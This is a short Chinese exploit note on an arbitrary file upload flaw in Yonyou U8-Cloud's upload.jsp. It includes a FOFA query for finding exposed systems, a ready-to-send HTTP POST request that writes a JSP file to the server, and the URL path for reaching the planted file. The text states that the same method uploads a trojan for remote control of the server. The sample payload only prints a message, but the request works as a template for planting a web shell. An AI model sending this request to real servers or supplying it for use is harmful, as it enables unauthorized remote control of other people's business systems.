用友U8-Cloudupload任意文件上传漏洞

用友U8-Cloud upload任意文件上传漏洞

该系统upload.jsp存在任意文件上传漏洞，攻击者可通过该漏洞上传木马，远程控制服务器

fofa

app="用友-U8-Cloud"

exp

POST /linux/pages/upload.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
filename: hack.jsp
Accept-Encoding: gzip

<% out.println("The website has vulnerabilities!!");%>

漏洞复现

路径

http://ip:port/linux/hack.jsp

用友U8-Cloud upload任意文件上传漏洞​

fofa​

exp​

漏洞复现​

路径​

用友U8-Cloud upload任意文件上传漏洞

fofa

exp

漏洞复现

路径